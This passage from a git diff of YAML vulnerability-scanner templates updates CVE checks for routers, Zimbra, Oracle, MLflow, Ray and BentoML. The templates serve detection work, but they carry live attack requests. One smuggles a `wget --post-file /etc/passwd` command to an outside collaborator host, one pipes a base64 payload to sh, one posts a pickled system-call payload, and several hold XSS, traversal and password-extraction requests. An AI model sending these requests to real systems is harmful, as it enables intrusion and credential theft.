info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-20150 - cwe-id: CWE-287 + cwe-id: CWE-306 + epss-score: 0.14411 + epss-percentile: 0.95182 + cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: trendnet + product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" tags: disclosure,router,tenable,cve,cve2021,trendnet -requests: +http: - raw: - | POST /apply_sec.cgi HTTP/1.1 @@ -27,10 +35,6 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -45,12 +49,16 @@ requests: words: - "text/html" + - type: status + status: + - 200 + extractors: - type: regex - part: body name: password group: 1 regex: - '' + part: body -# Enhanced by mp on 2022/04/05 +# digest: 490a00463044022046aa199ad85133757e14eb580e9862b4e41bbef8b9ccca9b8a8807d4e9c3bd7402206bcef1ad451255b30a7ddb6567fe3de67ec1e2f13aee3d8e3c6196853b649663:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-21816.yaml b/poc/cve/CVE-2021-21816.yaml index 1454d889c9..976e4d98e1 100644 --- a/poc/cve/CVE-2021-21816.yaml +++ b/poc/cve/CVE-2021-21816.yaml @@ -1,19 +1,24 @@ id: CVE-2021-21816 info: - name: D-LINK DIR-3040 - Syslog Information Disclosure - description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. + name: D-Link DIR-3040 1.13B03 - Information Disclosure author: gy741 severity: medium - reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - tags: cve,cve2021,dlink,exposure,router,syslog + description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21816 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2021-21816 cwe-id: CWE-922 + epss-score: 0.00237 + tags: cve,cve2021,dlink,exposure,router,syslog + metadata: + max-request: 1 -requests: +http: - method: GET path: - "{{BaseURL}}/messages" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/02/01 diff --git a/poc/cve/CVE-2021-22502.yaml b/poc/cve/CVE-2021-22502.yaml index a321359dd9..836561af0f 100644 --- a/poc/cve/CVE-2021-22502.yaml +++ b/poc/cve/CVE-2021-22502.yaml @@ -1,14 +1,12 @@ id: CVE-2021-22502 - info: name: Micro Focus Operation Bridge Reporter (OBR) RCE author: pikpikcu severity: critical reference: | - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502 + https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502 tags: cve,cve2021,obr,rce - requests: - raw: - | @@ -25,18 +23,15 @@ requests: {"userName":"something `wget --post-file /etc/passwd burpcollaborator.net`","credential":"whatever"} matchers-condition: and matchers: - - type: word words: - "application/json" part: header - - type: word words: - "An error occurred. Please contact your system administrator" part: body condition: and - - type: status status: - 401 diff --git a/poc/cve/CVE-2021-24286.yaml b/poc/cve/CVE-2021-24286.yaml index e3b6286721..44f7dffcf1 100644 --- a/poc/cve/CVE-2021-24286.yaml +++ b/poc/cve/CVE-2021-24286.yaml @@ -1,5 +1,4 @@ id: CVE-2021-24286 - info: name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting author: geeknik @@ -7,12 +6,10 @@ info: reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 severity: medium tags: cve,cve2021,xss - requests: - method: GET path: - "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);" - matchers-condition: and matchers: - type: word diff --git a/poc/cve/CVE-2021-3017.yaml b/poc/cve/CVE-2021-3017.yaml index 0967f3f37a..5a60c6d460 100644 --- a/poc/cve/CVE-2021-3017.yaml +++ b/poc/cve/CVE-2021-3017.yaml @@ -4,8 +4,15 @@ info: name: Intelbras WIN 300/WRN 342 Disclosure author: pikpikcu severity: high - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - tags: cve,cve2021,exposure + description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. + reference: + - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 + tags: cve,cve2021,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3017 requests: - method: GET @@ -17,9 +24,16 @@ requests: - type: word words: - 'def_wirelesspassword =' - - 'def_SSID =' + - 'Roteador Wireless' part: body + condition: and - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' diff --git a/poc/cve/CVE-2021-31537.yaml b/poc/cve/CVE-2021-31537.yaml index 0e40527eea..128ba7c301 100644 --- a/poc/cve/CVE-2021-31537.yaml +++ b/poc/cve/CVE-2021-31537.yaml @@ -3,7 +3,7 @@ id: CVE-2021-31537 info: name: SIS-REWE GO version 7.5.0/12C XSS author: geeknik - description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ severity: medium tags: cve,cve2021,xss @@ -19,9 +19,6 @@ requests: part: body words: - "" - - "SIS-REWE" - condition: and - - type: word part: header words: diff --git a/poc/cve/CVE-2021-35587.yaml b/poc/cve/CVE-2021-35587.yaml index 1ca9fa3b33..d49530cc45 100644 --- a/poc/cve/CVE-2021-35587.yaml +++ b/poc/cve/CVE-2021-35587.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 @@ -15,34 +17,40 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35587 cwe-id: CWE-502 + epss-score: 0.95643 + epss-percentile: 0.99236 + cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: verified: true - fofa-query: body="/oam/pages/css/login_page.css" + max-request: 1 + vendor: oracle + product: access_manager shodan-query: http.title:"Oracle Access Management" + fofa-query: body="/oam/pages/css/login_page.css" tags: cve,cve2021,oam,rce,java,unauth,oracle,kev -requests: +http: - method: GET path: - '{{BaseURL}}/oam/server/opensso/sessionservice' matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - "x-oracle-dms-ecid" - "x-oracle-dms-rid" - condition: or case-insensitive: true + condition: or - type: word part: body words: - "/oam/pages/css/general.css" -# Enhanced by mp on 2022/05/02 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100f6d73f1b41fdd1bfc1b430b7a051be821dc893567b2af11c759ad99ae192ca6d022079a7aff657604ea86a0c43894e1765c8c1e76ed07c59ea7eca41c17ae9c34b58:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-45967.yaml b/poc/cve/CVE-2021-45967.yaml index c8cfdf156a..320288e546 100644 --- a/poc/cve/CVE-2021-45967.yaml +++ b/poc/cve/CVE-2021-45967.yaml @@ -5,21 +5,30 @@ info: author: dwisiswant0 severity: critical description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. + remediation: | + Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html + - https://www.pascom.net/doc/en/release-notes/pascom19/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-45967 - cwe-id: CWE-918 + cwe-id: CWE-22 + epss-score: 0.73933 + epss-percentile: 0.97807 + cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: pascom_cloud_phone_system tags: cve,cve2021,pascom,ssrf -requests: +http: - method: GET path: - - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS) + - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" matchers-condition: and matchers: @@ -32,4 +41,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/28 \ No newline at end of file +# digest: 4a0a00473045022100ae0fa337bee83c96cd964ba9806623c708bb01ba80afc023519cfe76e27f30d9022063e92e6ae040abae6dcf35cf8a2b9be6e27b5820514a0faad39a74ceba8c87f0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-0378.yaml b/poc/cve/CVE-2022-0378.yaml index 9cce944e5f..0c129e0017 100644 --- a/poc/cve/CVE-2022-0378.yaml +++ b/poc/cve/CVE-2022-0378.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. + remediation: | + Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce @@ -14,21 +16,23 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0378 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.41081 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: microweber + product: microweber shodan-query: http.favicon.hash:780351152 tags: cve,cve2022,microweber,xss,huntr -requests: +http: - method: GET path: - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x' matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -36,4 +40,8 @@ requests: - 'onmousemove="alert(document.domain)' condition: and -# Enhanced by mp on 2022/02/28 + - type: status + status: + - 200 + +# digest: 4a0a00473045022073a374de7ceaffbdfd2a16e5e6062c867bc98a2d24d7fe891e630bdbe1b6768a022100f8eb1f57e3a27902c7669fe6448f13b83fdcdca373d1b05cd25ae7a9a538be77:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-24682.yaml b/poc/cve/CVE-2022-24682.yaml index d00a7c637f..5418c23eab 100644 --- a/poc/cve/CVE-2022-24682.yaml +++ b/poc/cve/CVE-2022-24682.yaml @@ -1,52 +1,52 @@ -id: CVE-2022-24682 - -info: - name: Zimbra Improper Encoding or Escaping of Output - author: rxerium - severity: medium - description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. - metadata: - max-request: 1 - tags: zimbra,kev - -http: - - method: GET - path: - - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Zimbra Collaboration Suite Web Client" - - - type: word - part: header - words: - - "application/x-javascript" - - - type: word - words: - - "8.8" - - "8.8.6" - - "8.8.7" - - "8.8.8" - - "8.8.9" - - "8.8.10" - - "8.8.11" - - "8.8.12" - - "8.8.13" - - "8.8.14" - part: version - - - type: regex - regex: - - "8.8.15p[12]" - - extractors: - - type: regex - part: body - group: 1 - regex: +id: CVE-2022-24682 + +info: + name: Zimbra Improper Encoding or Escaping of Output + author: rxerium + severity: medium + description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. + metadata: + max-request: 1 + tags: zimbra,kev + +http: + - method: GET + path: + - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Zimbra Collaboration Suite Web Client" + + - type: word + part: header + words: + - "application/x-javascript" + + - type: word + words: + - "8.8" + - "8.8.6" + - "8.8.7" + - "8.8.8" + - "8.8.9" + - "8.8.10" + - "8.8.11" + - "8.8.12" + - "8.8.13" + - "8.8.14" + part: version + + - type: regex + regex: + - "8.8.15p[12]" + + extractors: + - type: regex + part: body + group: 1 + regex: - 'CLIENT_VERSION\", {type:ZmSetting.T_CONFIG, defaultValue:\"(.*?)"' \ No newline at end of file diff --git a/poc/cve/CVE-2022-26159.yaml b/poc/cve/CVE-2022-26159.yaml index 41d6be2d94..08705eb77a 100644 --- a/poc/cve/CVE-2022-26159.yaml +++ b/poc/cve/CVE-2022-26159.yaml @@ -5,17 +5,28 @@ info: author: Remi Gascou (podalirius) severity: medium description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - https://podalirius.net/en/cves/2022-26159/ - https://issues.ametys.org/browse/CMS-10973 + - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-26159 + cwe-id: CWE-425 + epss-score: 0.00597 + epss-percentile: 0.75972 + cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ametys + product: ametys tags: cve,cve2022,plugin,ametys,cms -requests: +http: - method: GET path: - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' @@ -37,4 +48,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/23 +# digest: 4a0a0047304502203ae18ae0788ec7bba9ff7655f021e591d4738f30ebc268792ba8cad5511b62fc022100fb29e7d8ae023df0fdf98dd1918e899657007c99aa84a9ce14c6ac2d5f93e00b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-28363.yaml b/poc/cve/CVE-2022-28363.yaml index 46534e84f1..ffbcf1a3b7 100644 --- a/poc/cve/CVE-2022-28363.yaml +++ b/poc/cve/CVE-2022-28363.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + remediation: | + Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-rpvc-qgrm-r54f @@ -16,19 +18,22 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 + epss-score: 0.00237 + epss-percentile: 0.61655 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: reprisesoftware + product: reprise_license_manager tags: xss,rlm,packetstorm,cve,cve2022 -requests: +http: - method: GET path: - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -41,4 +46,8 @@ requests: words: - "text/html" -# Enhanced by mp on 2022/09/14 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100e9721c06d4b0e767eabf044318a9e04e5fe294864011b3f0a6081c9e0ab4889b0220124b28e0005f4ac4ee9c00928495eca980eaba0cd0cdb8d1f26c98073c902e73:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-41352.yaml b/poc/cve/CVE-2022-41352.yaml index 38de5d87eb..a5e3541e3f 100644 --- a/poc/cve/CVE-2022-41352.yaml +++ b/poc/cve/CVE-2022-41352.yaml @@ -1,40 +1,40 @@ -id: CVE-2022-41352 - -info: - name: Zimbra Improper Encoding or Escaping of Output - author: rxerium - severity: critical - description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. - metadata: - max-request: 1 - tags: zimbra,kev - -http: - - method: GET - path: - - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Zimbra Collaboration Suite Web Client" - - - type: word - part: header - words: - - "application/x-javascript" - - - type: word - words: - - "8.8.15" - - "9.0" - part: version - - extractors: - - type: regex - part: body - group: 1 - regex: +id: CVE-2022-41352 + +info: + name: Zimbra Improper Encoding or Escaping of Output + author: rxerium + severity: critical + description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. + metadata: + max-request: 1 + tags: zimbra,kev + +http: + - method: GET + path: + - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Zimbra Collaboration Suite Web Client" + + - type: word + part: header + words: + - "application/x-javascript" + + - type: word + words: + - "8.8.15" + - "9.0" + part: version + + extractors: + - type: regex + part: body + group: 1 + regex: - 'CLIENT_VERSION\", {type:ZmSetting.T_CONFIG, defaultValue:\"(.*?)"' \ No newline at end of file diff --git a/poc/cve/CVE-2023-6016.yaml b/poc/cve/CVE-2023-6016.yaml index a7c7c083cf..688203d048 100644 --- a/poc/cve/CVE-2023-6016.yaml +++ b/poc/cve/CVE-2023-6016.yaml @@ -1,50 +1,50 @@ -id: CVE-2023-6016 - -info: - name: H2O(v3.42.0.2) RCE via POJO Model import - author: VulnSphere - severity: critical - description: RCE in H2O dashboard by (ab)using it's POJO Model import feature - reference: - - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/ - classification: - cvss-score: 10 - cve-id: CVE-2023-6018 - cwe-id: CWE-78 - tags: h2o-3,h2o,cve,ml,huntr - -http: - - raw: - - | - POST /3/ModelBuilders/generic/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51 - - - | - POST /3/ModelBuilders/generic/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} - - - | - POST /3/ModelBuilders/generic/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} - - - | - POST /3/ModelBuilders/generic HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms http Interaction - words: +id: CVE-2023-6016 + +info: + name: H2O(v3.42.0.2) RCE via POJO Model import + author: VulnSphere + severity: critical + description: RCE in H2O dashboard by (ab)using it's POJO Model import feature + reference: + - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/ + classification: + cvss-score: 10 + cve-id: CVE-2023-6018 + cwe-id: CWE-78 + tags: h2o-3,h2o,cve,ml,huntr + +http: + - raw: + - | + POST /3/ModelBuilders/generic/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51 + + - | + POST /3/ModelBuilders/generic/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} + + - | + POST /3/ModelBuilders/generic/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} + + - | + POST /3/ModelBuilders/generic HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms http Interaction + words: - "http" \ No newline at end of file diff --git a/poc/cve/CVE-2023-6019.yaml b/poc/cve/CVE-2023-6019.yaml index 3ad1e8b2c6..0d2a0e2368 100644 --- a/poc/cve/CVE-2023-6019.yaml +++ b/poc/cve/CVE-2023-6019.yaml @@ -1,44 +1,44 @@ -id: CVE-2023-6019 - -info: - name: Ray(v2.6.3) cpu_profile command injection - author: VulnSphere - severity: critical - description: Ray command injection via the cpu_profile API endpoint allowing os command execution on the Ray dashboard host - reference: - - https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/ - classification: - cvss-score: 10 - cve-id: CVE-2023-6019 - cwe-id: CWE-78 - tags: ray,ml,cve,huntr - -variables: - python_payload: "python3 -c 'import socket;socket.gethostbyname(\"{{interactsh-url}}\")'" - -http: - - method: GET - path: - - "{{BaseURL}}/nodes?view=summary" - - "{{BaseURL}}/worker/cpu_profile?pid={{pid}}&ip={{node_ip}}&duration=5&native=0&format=%60echo%20{{base64(python_payload)}}|base64$IFS-d|sh%60" - - matchers: - - type: word - part: interactsh_protocol # Confirms DNS Interaction - words: - - "dns" - - extractors: - - type: json - part: body - internal: true - name: pid - json: - - '..|objects|.pid//empty[0]' - - - type: json - part: body - internal: true - name: node_ip - json: +id: CVE-2023-6019 + +info: + name: Ray(v2.6.3) cpu_profile command injection + author: VulnSphere + severity: critical + description: Ray command injection via the cpu_profile API endpoint allowing os command execution on the Ray dashboard host + reference: + - https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/ + classification: + cvss-score: 10 + cve-id: CVE-2023-6019 + cwe-id: CWE-78 + tags: ray,ml,cve,huntr + +variables: + python_payload: "python3 -c 'import socket;socket.gethostbyname(\"{{interactsh-url}}\")'" + +http: + - method: GET + path: + - "{{BaseURL}}/nodes?view=summary" + - "{{BaseURL}}/worker/cpu_profile?pid={{pid}}&ip={{node_ip}}&duration=5&native=0&format=%60echo%20{{base64(python_payload)}}|base64$IFS-d|sh%60" + + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + extractors: + - type: json + part: body + internal: true + name: pid + json: + - '..|objects|.pid//empty[0]' + + - type: json + part: body + internal: true + name: node_ip + json: - '..|objects|.ip//empty[0]' \ No newline at end of file diff --git a/poc/cve/CVE-2023-6975.yaml b/poc/cve/CVE-2023-6975.yaml index 4e5def40cb..6467b70616 100644 --- a/poc/cve/CVE-2023-6975.yaml +++ b/poc/cve/CVE-2023-6975.yaml @@ -1,41 +1,41 @@ -id: CVE-2023-6975 -info: - name: MLflow(v2.7.1) FTP Path Traversal - author: VulnSphere - severity: high - description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server. - reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - cvss-score: 9.3 - cve-id: CVE-2023-6975 - cwe-id: CWE-29 - tags: mlflow,ml,cve,path-traversal - -variables: - experiment_name: "{{rand_text_alpha(6)}}" - -http: - - raw: - - | - POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"name": "{{experiment_name}}"} - - | - POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"} - - | - GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: +id: CVE-2023-6975 +info: + name: MLflow(v2.7.1) FTP Path Traversal + author: VulnSphere + severity: high + description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server. + reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cve-id: CVE-2023-6975 + cwe-id: CWE-29 + tags: mlflow,ml,cve,path-traversal + +variables: + experiment_name: "{{rand_text_alpha(6)}}" + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{experiment_name}}"} + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"} + - | + GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: - "dns" \ No newline at end of file diff --git a/poc/cve/CVE-2024-2912.yaml b/poc/cve/CVE-2024-2912.yaml index 2003a19916..9b4d4d35cd 100644 --- a/poc/cve/CVE-2024-2912.yaml +++ b/poc/cve/CVE-2024-2912.yaml @@ -1,30 +1,30 @@ -id: CVE-2024-2912 - -info: - name: BentoML(v1.2.2) Insecure Deserialization RCE Simulation - author: VulnSphere - severity: critical - description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled. - reference: - - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-1188 # Insecure Default Initialization of Resource - cve-id: CVE-2024-2912 - tags: bentoml, rce, deserialization, huntr, ai, machine-learning,cve,cve2024 - -requests: - - method: POST - path: - - "{{BaseURL}}/summarize" - headers: - Content-Type: "application/vnd.bentoml+pickle" - body: !!binary | - gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4= - matchers-condition: and - matchers: - - type: word - words: - - "Input should be a valid dictionary or instance of Input" +id: CVE-2024-2912 + +info: + name: BentoML(v1.2.2) Insecure Deserialization RCE Simulation + author: VulnSphere + severity: critical + description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled. + reference: + - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-1188 # Insecure Default Initialization of Resource + cve-id: CVE-2024-2912 + tags: bentoml, rce, deserialization, huntr, ai, machine-learning,cve,cve2024 + +requests: + - method: POST + path: + - "{{BaseURL}}/summarize" + headers: + Content-Type: "application/vnd.bentoml+pickle" + body: !!binary | + gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4= + matchers-condition: and + matchers: + - type: word + words: + - "Input should be a valid dictionary or instance of Input" part: body \ No newline at end of file diff --git a/poc/cve/CVE-2024-5550.yaml b/poc/cve/CVE-2024-5550.yaml index ab4ab7379b..a70f7dda79 100644 --- a/poc/cve/CVE-2024-5550.yaml +++ 